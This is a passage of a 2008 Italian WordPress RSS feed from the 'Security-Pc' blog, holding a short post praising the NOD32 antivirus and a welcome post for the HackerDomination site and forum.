				<category><![CDATA[Antivirus]]></category>

		<guid isPermaLink="false">http://securitypc.wordpress.com/?p=8</guid>
		<description><![CDATA[
Il nod32 secondo me è uno dei migliori antivirus a cui vi potete affidare, ha ricevuto per il secondo anno consecutivo il premio come miglior antivirus dell&#8217;anno, inoltre le dimensioni del nod32 sono abbastanza convenienti, ed ha tante funzionalità, potete trovare una versiona di prova (30 giorni) direttamente nel sito ufficiale per poterlo testare.
Ecco qua [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=securitypc.wordpress.com&blog=3580549&post=8&subd=securitypc&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><img src="http://img410.imageshack.us/img410/9049/nod32logoan6.jpg" alt="" /></p>
<p>Il nod32 secondo me è uno dei migliori antivirus a cui vi potete affidare, ha ricevuto per il secondo anno consecutivo il premio come miglior antivirus dell&#8217;anno, inoltre le dimensioni del nod32 sono abbastanza convenienti, ed ha tante funzionalità, potete trovare una versiona di prova (30 giorni) direttamente nel <a href="http://www.nod32.it/download/index.php">sito ufficiale</a> per poterlo testare.</p>
<p><strong>Ecco qua uno screen:</strong></p>
<p><img src="http://img126.imageshack.us/img126/3633/nod32ao4.jpg" alt="" /></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/securitypc.wordpress.com/8/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/securitypc.wordpress.com/8/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/securitypc.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/securitypc.wordpress.com/8/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/securitypc.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/securitypc.wordpress.com/8/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/securitypc.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/securitypc.wordpress.com/8/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/securitypc.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/securitypc.wordpress.com/8/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/securitypc.wordpress.com/8/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/securitypc.wordpress.com/8/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=securitypc.wordpress.com&blog=3580549&post=8&subd=securitypc&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://securitypc.wordpress.com/2008/04/26/nod32/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/3ac20d9fd11a32ec665b3f15dd7e1814?s=96&#38;d=identicon" medium="image">
			<media:title type="html">DaRk MoNsTeR</media:title>
		</media:content>

		<media:content url="http://img410.imageshack.us/img410/9049/nod32logoan6.jpg" medium="image" />

		<media:content url="http://img126.imageshack.us/img126/3633/nod32ao4.jpg" medium="image" />
	</item>
		<item>
		<title>Security-Pc</title>
		<link>http://securitypc.wordpress.com/2008/04/26/security-pc/</link>
		<comments>http://securitypc.wordpress.com/2008/04/26/security-pc/#comments</comments>
		<pubDate>Sat, 26 Apr 2008 12:44:41 +0000</pubDate>
		<dc:creator>DaRk MoNsTeR</dc:creator>
				<category><![CDATA[Security-Pc]]></category>

		<guid isPermaLink="false">http://securitypc.wordpress.com/?p=7</guid>
		<description><![CDATA[Benvenuti visitatori, questo è il blog di HackerDomination, dove potete trovare tanti articoli sulla sicurezza informatica ma non solo, potete trovare anche argomenti sull&#8217;hacking, su messenger e molto altro ancora..
Vi ricordo se volete ci potete trovare anche nel nostro forum   .
Buona permenza da tutto lo staff..
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=securitypc.wordpress.com&blog=3580549&post=7&subd=securitypc&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Benvenuti visitatori, questo è il blog di <a href="http://hackerdomination.forumcommunity.net/">HackerDomination</a>, dove potete trovare tanti articoli sulla sicurezza informatica ma non solo, potete trovare anche argomenti sull&#8217;hacking, su messenger e molto altro ancora..</p>
<p>Vi ricordo se volete ci potete trovare anche nel nostro forum <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  .</p>
<p>Buona permenza da tutto lo staff..</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/securitypc.wordpress.com/7/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/securitypc.wordpress.com/7/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/securitypc.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/securitypc.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/securitypc.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/securitypc.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/securitypc.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/securitypc.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/securitypc.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/securitypc.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/securitypc.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/securitypc.wordpress.com/7/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=securitypc.wordpress.com&blog=3580549&post=7&subd=securitypc&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://securitypc.wordpress.com/2008/04/26/security-pc/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/3ac20d9fd11a32ec665b3f15dd7e1814?s=96&#38;d=identicon" medium="image">
			<media:title type="html">DaRk MoNsTeR</media:title>
		</media:content>
	</item>
	</channel>
</rss>